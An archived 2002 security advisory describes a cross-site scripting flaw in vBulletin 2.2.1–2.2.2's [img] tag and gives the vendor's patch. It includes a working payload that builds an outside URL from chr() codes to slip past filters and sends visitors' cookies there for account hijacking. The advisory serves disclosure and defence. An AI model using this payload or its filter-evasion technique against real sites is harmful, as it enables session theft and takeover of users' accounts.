22th Mar 2002   [SBWID-5203]
	
COMMAND
	vBulletin account hijacking using [IMG] tag
SYSTEMS AFFECTED
	 2.2.2 & 2.2.1 & maybe olders
	
PROBLEM
	Cano2 [http://www.buhaboard.de] found following, regarding vBulletin,  a
	web forums package written in PHP.
	
	There is a vulnerability in the vBulletins\'s [img]-Tag  implementation,
	that allows users to inject  vbs-code  in  posts  and  private  messages
	([img] is switched on by default). Through that, an attacker is able  to
	steal other users cookies and maybe hijack their accounts.
	
	The  following  code  sends  the  user\'s   cookie   to   a   php-script
	(http://www.ignite.barrysworld.net/test.php?c= in this case, which  just
	prints it back to the browser) It is enclosed in [code]-Tag, the url  is
	encoded in ascii and linebreaks are inserted to avoid filtering of  some
	characters and insertion of <br>-Tags
	
	
	[code][img]vbscript:location.replace(
	chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
	chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
	chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
	chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
	chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
	chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
	chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
	chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
	chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
	escape(document.cookie)
	)[/img][/code]
	
	
SOLUTION
	Jelsoft claimed to have  made  a  patch  \"which  clamps  down  on  what
	characters are allowed in an [img] tag,  as  well  as  requiring  it  to
	start with http://\".
	
	Patched in last version (2.2.4).
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH